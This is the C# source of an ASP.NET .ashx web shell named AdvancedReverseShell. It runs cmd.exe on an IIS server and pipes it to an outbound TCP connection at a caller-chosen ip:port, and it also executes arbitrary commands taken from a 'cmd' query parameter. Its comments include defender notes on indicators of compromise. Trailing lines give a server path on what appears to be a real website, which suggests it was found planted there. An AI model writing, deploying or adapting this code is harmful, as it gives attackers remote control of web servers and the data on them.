<%@ webhandler language="C#" class="AdvancedReverseShell" %>
using System;
using System.Web;
using System.Diagnostics;
using System.Net;
using System.Net.Sockets;
using System.Threading;
using System.Text;
/// <summary>
/// ASP.NET <c>.ashx</c> handler that behaves as a web shell. Given an <c>ip</c> and
/// <c>port</c> query-string pair it starts <c>cmd.exe</c> on the server and bridges the
/// process's standard input/output to an outbound TCP connection (a reverse shell); for
/// <c>method=http</c> it instead runs one command taken from the <c>cmd</c> query
/// parameter and returns the output in the HTTP response.
/// </summary>
/// <remarks>
/// Defender notes. Everything here runs under the identity of the IIS application pool
/// that hosts the handler. Indicators that follow directly from the code below: the web
/// worker process (typically w3wp.exe) spawning cmd.exe; an outbound TCP connection from
/// the web server to a caller-chosen ip:port; requests to this handler carrying the
/// query-string parameters ip, port, method and cmd; and, for method=dns, a resolver
/// query for a long Base64-looking label under example.com. A request that stays open
/// for the lifetime of the shell session is itself an indicator, because ConnectDirect
/// blocks the request thread until the socket or the process closes.
/// </remarks>
public class AdvancedReverseShell : IHttpHandler
{
// One handler instance is reused across requests; the class keeps no per-request state.
public bool IsReusable
{
get { return true; }
}
/// <summary>
/// Renders the connection form and, when both <c>ip</c> and <c>port</c> are present,
/// dispatches to one of the three connection paths.
/// </summary>
/// <param name="ctx">Current request/response context; every input is read from the query string.</param>
public void ProcessRequest(HttpContext ctx)
{
ctx.Response.ContentType = "text/html; charset=utf-8";
// All three values are caller-controlled request input; only ip and port gate execution.
string ip = ctx.Request.QueryString["ip"];
string port = ctx.Request.QueryString["port"];
string method = ctx.Request.QueryString["method"] ?? "direct";
ctx.Response.Output.WriteLine("<html><head><title></title></head><body>");
ctx.Response.Output.WriteLine("<h2></h2>");
// Connection form (GET), pre-filled from the current query string.
ctx.Response.Output.WriteLine("<form method='GET'>");
// HtmlEncode(null) returns null, which concatenates as an empty string, so a missing
// parameter does not throw here.
ctx.Response.Output.WriteLine("Target IP: <input name='ip' value='" + HttpUtility.HtmlEncode(ip) + "'><br>");
ctx.Response.Output.WriteLine("Port: <input name='port' value='" + HttpUtility.HtmlEncode(port) + "'><br>");
ctx.Response.Output.WriteLine("Method: <select name='method'>");
// These comparisons are case-sensitive, while the dispatch below lower-cases the value.
ctx.Response.Output.WriteLine("<option value='direct'" + (method == "direct" ? " selected" : "") + ">Direct TCP</option>");
ctx.Response.Output.WriteLine("<option value='dns'" + (method == "dns" ? " selected" : "") + ">DNS Tunnel</option>");
ctx.Response.Output.WriteLine("<option value='http'" + (method == "http" ? " selected" : "") + ">HTTP Tunnel</option>");
ctx.Response.Output.WriteLine("</select><br>");
ctx.Response.Output.WriteLine("<input type='submit' value='Connect'>");
ctx.Response.Output.WriteLine("</form>");
if (!string.IsNullOrEmpty(ip) && !string.IsNullOrEmpty(port))
{
try
{
// A non-numeric port raises FormatException, which the catch below reports inline.
int portNum = int.Parse(port);
// Unlike the form fields above, ip/port/method are echoed here without HtmlEncode.
ctx.Response.Output.WriteLine("<pre>Attempting connection to " + ip + ":" + port + " using " + method + " method...</pre>");
// Flush so the status line reaches the client before the blocking connect below.
ctx.Response.Flush();
// Anything other than "dns"/"http" (including the default) takes the direct TCP path.
switch (method.ToLower())
{
case "dns":
ConnectViaDNS(ip, portNum);
break;
case "http":
ConnectViaHTTP(ctx, ip, portNum);
break;
default:
ConnectDirect(ip, portNum);
break;
}
}
catch (Exception ex)
{
// Any failure (parse, connect, process start) is reported to the caller only; nothing is logged server-side.
ctx.Response.Output.WriteLine("<pre style='color:red;'>Error: " + HttpUtility.HtmlEncode(ex.Message) + "</pre>");
}
}
ctx.Response.Output.WriteLine("</body></html>");
}
/// <summary>
/// Opens an outbound TCP connection to <paramref name="ip"/>:<paramref name="port"/>,
/// starts <c>cmd.exe</c> with redirected standard streams, and pumps bytes between the
/// socket and the process until either side closes. Blocks the calling request thread
/// for the whole session.
/// </summary>
/// <param name="ip">Remote host the server connects out to.</param>
/// <param name="port">Remote TCP port.</param>
private void ConnectDirect(string ip, int port)
{
// The server initiates the connection (reverse direction), so egress filtering and
// outbound-connection telemetry on the web tier are the relevant controls.
using (TcpClient client = new TcpClient(ip, port))
{
using (NetworkStream stream = client.GetStream())
{
// cmd.exe runs as the application-pool identity with no window and all stdio redirected.
ProcessStartInfo psi = new ProcessStartInfo
{
FileName = "cmd.exe",
RedirectStandardInput = true,
RedirectStandardOutput = true,
RedirectStandardError = true,
UseShellExecute = false,
CreateNoWindow = true
};
using (Process process = Process.Start(psi))
{
// Thread 1: process stdout -> socket. Only StandardOutput is drained;
// StandardError is redirected but never read in this method.
Thread outputThread = new Thread(() =>
{
byte[] buffer = new byte[1024];
int bytesRead;
while ((bytesRead = process.StandardOutput.BaseStream.Read(buffer, 0, buffer.Length)) > 0)
{
stream.Write(buffer, 0, bytesRead);
}
});
outputThread.Start();
// Thread 2: socket -> process stdin, flushed after every chunk.
Thread inputThread = new Thread(() =>
{
byte[] buffer = new byte[1024];
int bytesRead;
while ((bytesRead = stream.Read(buffer, 0, buffer.Length)) > 0)
{
process.StandardInput.BaseStream.Write(buffer, 0, bytesRead);
process.StandardInput.BaseStream.Flush();
}
});
inputThread.Start();
// Block until both pumps end (socket or process closed); the HTTP request stays open meanwhile.
outputThread.Join();
inputThread.Join();
}
}
}
}
/// <summary>
/// Issues a single DNS lookup whose left-most label is the Base64 encoding of
/// "connect &lt;ip&gt; &lt;port&gt;" under example.com, then calls
/// <see cref="ConnectDirect"/> regardless of the lookup's outcome.
/// </summary>
/// <remarks>
/// No data is tunnelled over DNS: both the success path and the SocketException path end
/// in the same direct TCP connection. The lookup is the only extra observable — a
/// resolver query for a long Base64-looking label under example.com. Base64 output may
/// contain '+', '/' or '=', which are not valid host-name characters; only
/// SocketException is caught here, so any other exception raised by GetHostEntry
/// propagates to the catch in ProcessRequest.
/// </remarks>
/// <param name="ip">Remote host passed through to <see cref="ConnectDirect"/>.</param>
/// <param name="port">Remote TCP port passed through to <see cref="ConnectDirect"/>.</param>
private void ConnectViaDNS(string ip, int port)
{
// Encode the target as one DNS label (cosmetic; see remarks).
string encodedCmd = Convert.ToBase64String(Encoding.UTF8.GetBytes("connect " + ip + " " + port));
string domain = encodedCmd + ".example.com";
try
{
// The result is unused; the call exists only to emit the query.
IPHostEntry entry = Dns.GetHostEntry(domain);
// Success and failure converge on the same direct connection.
ConnectDirect(ip, port);
}
catch (SocketException)
{
// Lookup failure is the normal outcome (the name is not expected to exist); same path as success.
ConnectDirect(ip, port);
}
}
/// <summary>
/// Single-request command execution: if the <c>cmd</c> query-string parameter is
/// present, runs <c>cmd.exe /c &lt;cmd&gt;</c> and writes its stdout (and stderr, if
/// non-empty) into the HTTP response, HTML-encoded.
/// </summary>
/// <remarks>
/// The status text says "Use POST requests", but the command is read from the query
/// string, so it appears in the URL and therefore typically in IIS request logs — useful
/// for reconstructing activity during incident response. <paramref name="ip"/> and
/// <paramref name="port"/> are not used on this path; they only gate the call from
/// ProcessRequest.
/// </remarks>
/// <param name="ctx">Request context; cmd is read from its query string and output is written to its response.</param>
/// <param name="ip">Unused in this method.</param>
/// <param name="port">Unused in this method.</param>
private void ConnectViaHTTP(HttpContext ctx, string ip, int port)
{
// The message is informational only; no persistent tunnel is created.
ctx.Response.Output.WriteLine("<pre>HTTP tunnel established. Use POST requests to send commands.</pre>");
ctx.Response.Flush();
string cmd = ctx.Request.QueryString["cmd"];
if (!string.IsNullOrEmpty(cmd))
{
// Unvalidated request input is handed verbatim to the command interpreter.
ProcessStartInfo psi = new ProcessStartInfo
{
FileName = "cmd.exe",
Arguments = "/c " + cmd,
RedirectStandardOutput = true,
RedirectStandardError = true,
UseShellExecute = false,
CreateNoWindow = true
};
using (Process process = Process.Start(psi))
{
// stdout is read to completion before stderr; both are HTML-encoded before being echoed.
string output = process.StandardOutput.ReadToEnd();
string error = process.StandardError.ReadToEnd();
ctx.Response.Output.Write(HttpUtility.HtmlEncode(output));
if (!string.IsNullOrEmpty(error))
{
ctx.Response.Output.Write("<span style='color:red;'>" + HttpUtility.HtmlEncode(error) + "</span>");
}
}
}
}
}
Path: D:\INETPUB\VHOSTS\fcaromatics.com\httpdocs\ProductImg
Drives: